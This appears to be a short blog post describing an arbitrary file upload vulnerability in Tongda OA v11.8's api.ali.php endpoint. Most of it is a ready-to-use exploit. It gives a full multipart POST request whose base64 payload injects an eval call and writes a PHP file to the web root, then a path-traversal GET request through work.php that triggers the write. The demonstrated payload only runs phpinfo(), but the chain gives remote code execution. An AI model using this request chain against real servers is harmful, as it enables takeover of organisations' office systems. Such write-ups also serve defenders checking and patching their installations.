Tongda Oa V11 8 Api Ali Php Arbitrary File Upload Vulnerability
Tongda Oa V11 8 Api Ali Php Arbitrary File Upload Vulnerability
Tongda OA v11.8 api.ali.php any file upload vulnerability
Vulnerability Description
Tongda OA v11.8 api.ali.php has a vulnerability to upload any file. The attacker can control the server by uploading malicious files through the leak.
Vulnerability Impact
Tongda OA v11.8
Vulnerability reappears
Login page
Send request packets like api.ali.php
1
2
3
4
5
6
7
8
9
10
11
12
13
POST /mobile/api/api.ali.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 422
Content-Type: multipart/form-data; boundary=502f67681799b07e4de6b503655f5cae
Accept-Encoding: gzip
--502f67681799b07e4de6b503655f5cae
Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
Content-Type: application/octet-stream
{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{\"a\":\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\"}"}
--502f67681799b07e4de6b503655f5cae--
Parameter a base decoding
ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==file_put_contents(‘../../fb6790f4.php’,’<?php phpinfo();?>’);
Send GET request to write to the file
1
/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2109/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4
The request for 2109 is year and month, and the path is /fb6790f4.php,
This post is licensed under CC BY 4.0 by the author.